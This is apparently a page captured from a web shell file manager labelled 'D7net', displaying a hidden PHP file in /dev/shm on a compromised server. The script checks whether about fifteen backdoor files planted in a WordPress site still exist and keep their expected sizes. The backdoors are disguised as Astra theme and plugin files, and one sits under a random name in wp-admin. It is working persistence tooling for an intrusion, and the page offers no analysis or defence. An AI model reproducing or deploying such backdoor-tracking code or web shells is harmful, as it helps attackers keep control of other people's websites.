D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.comp
back
Copy
<?php $r = '/home/houscjmf/techinverse.net'; $x = ["/wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/layout/class.astra.lifter.general.configs.php"=>"bd@@258573@@645", "/wp-content/themes/astra/inc/lib/bsf-analytics/modules/deactivation-survey/classes/class.deactivation.survey.feedback.php"=>"bd@@258575@@935", "/wp-content/plugins/astra-sites/inc/lib/gutenberg-templates/inc/block/spectra.ai.block.php"=>"bd@@258577@@586", "/wp-admin/2wQCNhpaq8K.php"=>"bd@@23499@@36335", "/wp-content/themes/astra/inc/modules/related-posts/customizer/class-astra-related-posts-configs.php"=>"bd@@259862@@25", "/wp-content/themes/astra/inc/dynamic-css/comments-flex.php"=>"bd@@259866@@84", "/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/social-footer.php"=>"bd@@259873@@73", "/wp-content/themes/astra/inc/customizer/configurations/builder/header/class-astra-header-html-component-configs.php"=>"bd@@259891@@37", "/wp-content/themes/astra/inc/builder/type/footer/below-footer/class-astra-below-footer.php"=>"bd@@259899@@49", "/wp-content/plugins/astra-sites/inc/lib/ai-builder/inc/compatibility/suremail/ai.builder.compatibility.suremail.php"=>"bd@@259904@@927", "/wp-content/plugins/astra-sites/inc/lib/ai-builder/inc/compatibility/surerank/ai.builder.compatibility.surerank.php"=>"bd@@259906@@566", "/wp-content/themes/astra/inc/builder/type/base/dynamic-css/widget/class.astra.widget.component.dynamic.css.php"=>"bd@@259907@@609", "/wp-content/themes/astra/inc/builder/type/header/account/dynamic-css/blockform.php"=>"bd@@259910@@569", "/wp-content/themes/astra/inc/builder/type/footer/social-icon/dynamic-css/FTP.php"=>"bd@@258572@@610", "/wp-content/themes/astra/inc/builder/type/header/off-canvas/dynamic-css/db_export.php"=>"bd@@259911@@914"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');